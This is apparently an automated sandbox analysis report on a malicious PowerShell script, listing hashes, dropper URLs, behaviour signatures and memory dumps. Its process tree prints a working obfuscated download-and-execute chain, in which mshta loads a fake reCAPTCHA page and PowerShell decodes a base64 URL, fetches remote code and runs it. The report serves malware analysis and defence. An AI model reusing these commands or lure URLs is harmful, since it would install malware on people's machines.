Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    23-12-2024 17:44

General

  • Target

    run.ps1

  • Size

    98B

  • MD5

    f06b8028feb204bc56013b2f961ea80c

  • SHA1

    8d5eeee9730fcd09b7e46b566d00b28458405457

  • SHA256

    cd1dab4f48894954a1c3fec77cb8af692a49853cb7b0c748021bbecbec8496c1

  • SHA512

    fbc4f28323c80ccd2faf9030aefecb47846aa379df61f6bcbcaf093691669f375cfcb09a519969d16e0e3b88faf5baaa0538faf3695c95595d501f3839bedc76

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://recaptha-verify-8u.pages.dev

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://polovoiinspektor.shop/secure/login.txt

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\run.ps1
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1732
    • C:\Windows\system32\mshta.exe
      "C:\Windows\system32\mshta.exe" https://recaptha-verify-8u.pages.dev
      2⤵
      • Blocklisted process makes network request
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:1516
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "& {$U=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly9wb2xvdm9paW5zcGVrdG9yLnNob3Avc2VjdXJlL2xvZ2luLnR4dA=='));$C=(Invoke-WebRequest -Uri $U -UseBasicParsing).Content;$B=[scriptblock]::Create($C);&$B}"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2648

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\U093M1W5Q9U1U98QL0J7.temp

    Filesize

    7KB

    MD5

    d0cd7f929e651c9482562d1784a1b722

    SHA1

    28a54f1fe3a7d2bd3cebacb091a89880367fe8e5

    SHA256

    5b57e37aaeb007ea13d519a25c966dda606ef331f860b08180dab6af0d099a7c

    SHA512

    1c7721dc6ddd1ecf9bedcb94651f08082c442e9a2ae4c97800af468d96e9c0ad33e1ec9a6a2a6216270673d39cda26d2b08dd88f78c2b75cdcdc612a2a7c2ba7

  • memory/1732-4-0x000007FEF598E000-0x000007FEF598F000-memory.dmp

    Filesize

    4KB

  • memory/1732-5-0x000000001B660000-0x000000001B942000-memory.dmp

    Filesize

    2.9MB

  • memory/1732-6-0x0000000001F00000-0x0000000001F08000-memory.dmp

    Filesize

    32KB

  • memory/1732-7-0x000007FEF56D0000-0x000007FEF606D000-memory.dmp

    Filesize

    9.6MB

  • memory/1732-9-0x0000000002E0B000-0x0000000002E72000-memory.dmp

    Filesize

    412KB

  • memory/1732-8-0x0000000002E04000-0x0000000002E07000-memory.dmp

    Filesize

    12KB

  • memory/1732-32-0x000007FEF56D0000-0x000007FEF606D000-memory.dmp

    Filesize

    9.6MB

  • memory/2648-29-0x000000001B680000-0x000000001B962000-memory.dmp

    Filesize

    2.9MB

  • memory/2648-30-0x00000000027E0000-0x00000000027E8000-memory.dmp

    Filesize

    32KB